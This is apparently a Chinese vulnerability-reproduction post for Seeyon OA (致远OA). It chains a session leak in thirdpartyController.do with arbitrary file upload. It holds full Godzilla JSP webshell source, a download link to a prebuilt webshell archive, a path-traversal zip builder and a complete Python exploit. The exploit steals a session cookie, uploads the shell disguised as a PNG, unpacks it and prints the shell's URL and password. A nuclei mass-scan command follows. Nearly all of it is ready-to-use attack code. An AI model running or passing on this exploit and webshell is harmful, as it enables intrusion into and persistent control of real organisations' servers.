漏洞复现 致远OA thirdpartyController.do Session泄露导致+文件上传漏洞

1.需要先在当前路径放入hellozhiyuan1.zip文件，为哥斯拉马，如下为生成好的链接：https://pan.baidu.com/s/1suxgMTxO24ssrBVmqtm9hw 提取码：jxxy 
2.也可以使用如下脚本生成压缩文件import zipfile
zf=zipfile.ZipFile('hellozhiyuan1.zip', mode='a', compression=zipfile.ZIP_DEFLATED)fname=f'..\hellozhiyuan1.jsp'shellcode='<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>'zf.writestr('layout.xml', "")zf.writestr(fname, shellcode)
3.EXP脚本如下：# coding: utf-8import requestsimport sysimport randomimport timeimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():    print('+  &#x0;33[34mVersion: 致远OA session泄露任意文件上传漏洞                                                  &#x0;33[0m')    print('+  &#x0;33[36m使用格式:  python3 poc.py                                            &#x0;33[0m')    print('+  &#x0;33[36mUrl         >>> http://xxx.xxx.xxx.xxx                                &#x0;33[0m')    print('+------------------------------------------')def POC_1(target_url):    vuln_url = target_url + "/seeyon/thirdpartyController.do"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",        "Content-Type": "application/x-www-form-urlencoded",    }    data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)        if response.status_code == 200 and 'a8genius.do' in response.text and 'set-cookie' in str(response.headers).lower():            cookies = response.cookies            cookies = requests.utils.dict_from_cookiejar(cookies)            cookie = cookies['JSESSIONID']            targeturl = target_url + '/seeyon/fileUpload.do?method=processUpload'            print("&#x0;33[32m[o] 目标 {} 正在上传压缩包文件.... n[o] Cookie: {} &#x0;33[0m".format(target_url, cookie))            files = [('file1', ('360icon.png', open('hellozhiyuan1.zip', 'rb'), 'image/png'))]            headers = {'Cookie':"JSESSIONID=%s" % cookie}            data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"}            response = requests.post(url=targeturl,files=files,data=data, headers=headers,timeout=60,verify=False)            reg = re.findall('fileurls=fileurls+","+'(.+)'',response.text,re.I)            if len(reg)==0:                sys.exit("上传文件失败")            POC_2(target_url, cookie, reg, headers)        else:            print("&#x0;33[31m[x] 目标 {} 不存在漏洞 &#x0;33[0m".format(target_url))    except Exception as e:        print("&#x0;33[31m[x] 目标 {} 请求失败 &#x0;33[0m".format(target_url),e)def POC_2(target_url, cookie, reg, headers):    vuln_url = target_url + '/seeyon/ajax.do'    datestr = time.strftime('%Y-%m-%d')    post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + reg[0] + '%22%5D'    headers['Content-Type']="application/x-www-form-urlencoded"    print("&#x0;33[32m[o] 目标 {} 正在解压文件.... &#x0;33[0m".format(target_url))    try:        response = requests.post(vuln_url, data=post,headers=headers,timeout=60,verify=False)        if response.status_code == 500:            print("&#x0;33[32m[o] 目标 {} 解压文件成功.... &#x0;33[0m".format(target_url))            print("&#x0;33[32m[o] 默认Webshell地址: {}/seeyon/common/designer/pageLayout/hellozhiyuan1.jsp &#x0;33[0m".format(target_url))            print("&#x0;33[32m[o] 哥斯拉密码: pass &#x0;33[0m".format(target_url))        else:                print("&#x0;33[31m[x] 目标 {} 不存在漏洞 &#x0;33[0m".format(target_url))    except Exception as e:        print("&#x0;33[31m[x] 目标 {} 请求失败 &#x0;33[0m".format(target_url),e)if __name__ == '__main__':    title()    target_url = str(input("&#x0;33[35mPlease input Attack UrlnUrl >>> &#x0;33[0m"))    POC_1(target_url)

nuclei.exe -t zhiyuanOA-thirdpartyController-cookie-leakage.yaml -l subs.txt -stats